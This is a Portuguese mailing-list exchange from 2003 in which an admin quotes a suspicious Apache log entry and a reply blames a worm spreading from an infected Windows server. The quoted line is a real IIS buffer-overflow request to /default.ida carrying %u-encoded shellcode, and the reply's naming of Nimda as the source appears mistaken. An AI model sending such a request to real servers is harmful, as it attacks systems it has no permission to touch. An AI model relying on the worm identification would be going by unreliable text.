Mateus Reis wrote:
>Venho notado logs estranhos no apache.
>Abaixo segue algumas linhas pertinentes do access_log e do error_log
>O vem a ser isso? E algum scaneamento ou algo do tipo?
>200.171.30.44 - - [23/Mar/2003:04:25:11 -0300] "GET
> /default.ida?XXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
>9090%
> u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
>00%u5 31b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 205 "-" "-"

N�o. � algum servidor Windows infectado pelo Nimda tentando se espalhar para o 
seu servidor.

-- 
  Thiago Macieira - UFOT Registry number: 1001
 [EMAIL PROTECTED]
   ICQ UIN: 1967141  PGP/GPG: 0x6EF45358
     Registered Linux user #65028

Attachment: pgp00000.pgp
Description: signature

Responder a